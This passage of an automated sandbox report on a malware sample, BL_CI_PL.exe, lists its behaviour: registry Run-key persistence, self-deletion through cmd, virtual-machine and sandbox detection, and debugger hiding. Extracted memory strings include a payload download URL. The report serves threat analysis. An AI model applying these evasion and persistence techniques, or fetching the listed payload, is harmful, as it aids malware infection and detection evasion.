        Source: C:\Windows\SysWOW64\NETSTAT.EXE Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FBF8U8LXCN

        Hooking and other Techniques for Hiding and Protection:

        Self deletion via cmd delete
        Source: C:\Windows\SysWOW64\ipconfig.exe Process created: /c del "C:\Users\user\Desktop\BL_CI_PL.exe"
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Tries to detect Any.run
        Source: C:\Users\user\Desktop\BL_CI_PL.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\BL_CI_PL.exe File opened: C:\Program Files\qga\qga.exe
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe File opened: C:\Program Files\qga\qga.exe
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: k4n8p7lb.exe, 00000020.00000002.30160035805.0000000002420000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000021.00000002.30160236934.0000000002450000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=
        Source: BL_CI_PL.exe, 0000000A.00000002.26190152541.0000000002490000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301474748.0000000002480000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455284321.0000000002470000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://BGREENIDAHO.COM/NEWFILE/BIN_UFDEK247.BIN
        Source: BL_CI_PL.exe, 00000001.00000002.25498025009.00000000031E0000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190152541.0000000002490000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874716152.0000000003170000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965590309.0000000003180000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301474748.0000000002480000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455284321.0000000002470000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29976228145.0000000002C70000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060229035.00000000031A0000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160035805.0000000002420000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000021.00000002.30160236934.0000000002450000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: BL_CI_PL.exe, 00000001.00000002.25498025009.00000000031E0000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874716152.0000000003170000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965590309.0000000003180000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29976228145.0000000002C70000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060229035.00000000031A0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
        Source: C:\Windows\explorer.exe TID: 7152 Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4488 Thread sleep count: 104 > 30
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4488 Thread sleep time: -208000s >= -30000s
        Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 1_2_02B40A79 rdtsc 1_2_02B40A79
        Source: C:\Users\user\Desktop\BL_CI_PL.exe API coverage: 1.1 %
        Source: C:\Windows\SysWOW64\ipconfig.exe API coverage: 2.2 %
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe API coverage: 1.0 %
        Source: C:\Windows\SysWOW64\NETSTAT.EXE API coverage: 1.6 %
        Source: C:\Windows\SysWOW64\wscript.exe API coverage: 1.5 %
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F2FA90 FindFirstFileW,FindNextFileW,FindClose, 14_2_02F2FA90
        Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 14_2_02F2FA89 FindFirstFileW,FindNextFileW,FindClose, 14_2_02F2FA89
        Source: C:\Users\user\Desktop\BL_CI_PL.exe System information queried: ModuleInformation
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
        Source: BL_CI_PL.exe, 0000000A.00000003.26182417693.00000000008D4000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25861907176.00000000008D4000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25860498869.00000000008D4000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188982236.00000000008D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26114272250.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25997655299.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896814606.00000000112B7000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29294663077.00000000007D3000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29256514506.00000000007D3000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29300200791.00000000007D3000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29454227879.000000000079F000.00000004.00000020.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347354430.000000000079F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: BL_CI_PL.exe, 00000001.00000002.25498025009.00000000031E0000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190152541.0000000002490000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874716152.0000000003170000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965590309.0000000003180000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301474748.0000000002480000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455284321.0000000002470000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29976228145.0000000002C70000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060229035.00000000031A0000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160035805.0000000002420000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000021.00000002.30160236934.0000000002450000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: k4n8p7lb.exe, 0000001B.00000002.29454227879.000000000079F000.00000004.00000020.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347354430.000000000079F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW_
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
        Source: firefox.exe, 00000018.00000002.28539309869.00000206223AF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
        Source: k4n8p7lb.exe, 00000020.00000002.30160035805.0000000002420000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000021.00000002.30160236934.0000000002450000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=
        Source: BL_CI_PL.exe, 00000001.00000002.25498025009.00000000031E0000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874716152.0000000003170000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965590309.0000000003180000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29976228145.0000000002C70000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060229035.00000000031A0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
        Source: k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
        Source: explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW_c@/
        Source: BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWP
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
        Source: k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmp Binary or memory string: vmicvss
        Source: k4n8p7lb.exe, 0000001B.00000002.29453696047.0000000000734000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW !z%SystemRoot%\system32\mswsock.dll
        Source: k4n8p7lb.exe, 0000001A.00000002.29299426139.0000000000763000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWH
        Source: BL_CI_PL.exe, 0000000A.00000003.26182417693.00000000008D4000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25861907176.00000000008D4000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25860498869.00000000008D4000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188982236.00000000008D4000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWiP
        Source: explorer.exe, 0000000D.00000000.25899320746.00000000117FF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26001168759.00000000117FF000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW}
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
        Source: BL_CI_PL.exe, 0000000A.00000002.26190152541.0000000002490000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301474748.0000000002480000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455284321.0000000002470000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://bgreenidaho.com/Newfile/bin_UFDek247.bin
        Source: k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

        Anti Debugging:

        Hides threads from debuggers
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Thread information set: HideFromDebugger
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe Thread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Code function: 1_2_02B40A79 rdtsc
        Source: C:\Users\user\Desktop\BL_CI_PL.exe Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E2C10 mov eax, dword ptr fs:[00000030h]10_2_1E8E2C10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E2C10 mov eax, dword ptr fs:[00000030h]10_2_1E8E2C10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E2C10 mov eax, dword ptr fs:[00000030h]10_2_1E8E2C10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C20 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CAC20 mov eax, dword ptr fs:[00000030h]10_2_1E8CAC20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CAC20 mov eax, dword ptr fs:[00000030h]10_2_1E8CAC20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CAC20 mov eax, dword ptr fs:[00000030h]10_2_1E8CAC20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E975C38 mov eax, dword ptr fs:[00000030h]10_2_1E975C38
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E975C38 mov ecx, dword ptr fs:[00000030h]10_2_1E975C38
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E4C3D mov eax, dword ptr fs:[00000030h]10_2_1E8E4C3D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A8C3D mov eax, dword ptr fs:[00000030h]10_2_1E8A8C3D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984C59 mov eax, dword ptr fs:[00000030h]10_2_1E984C59
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E933C57 mov eax, dword ptr fs:[00000030h]10_2_1E933C57
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ADC40 mov eax, dword ptr fs:[00000030h]10_2_1E8ADC40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C40 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBC6E mov eax, dword ptr fs:[00000030h]10_2_1E8EBC6E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBC6E mov eax, dword ptr fs:[00000030h]10_2_1E8EBC6E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ACC68 mov eax, dword ptr fs:[00000030h]10_2_1E8ACC68
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B0C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B0C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B0C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B0C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B0C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B0C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B8C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B8C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B8C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B8C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8B8C79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ACD8A mov eax, dword ptr fs:[00000030h]10_2_1E8ACD8A
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ACD8A mov eax, dword ptr fs:[00000030h]10_2_1E8ACD8A
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B6D91 mov eax, dword ptr fs:[00000030h]10_2_1E8B6D91
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A6DA6 mov eax, dword ptr fs:[00000030h]10_2_1E8A6DA6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E2DBC mov eax, dword ptr fs:[00000030h]10_2_1E8E2DBC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E2DBC mov ecx, dword ptr fs:[00000030h]10_2_1E8E2DBC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ADDB0 mov eax, dword ptr fs:[00000030h]10_2_1E8ADDB0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B7DB6 mov eax, dword ptr fs:[00000030h]10_2_1E8B7DB6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984DA7 mov eax, dword ptr fs:[00000030h]10_2_1E984DA7
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96ADD6 mov eax, dword ptr fs:[00000030h]10_2_1E96ADD6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96ADD6 mov eax, dword ptr fs:[00000030h]10_2_1E96ADD6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A8DCD mov eax, dword ptr fs:[00000030h]10_2_1E8A8DCD
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E95FDF4
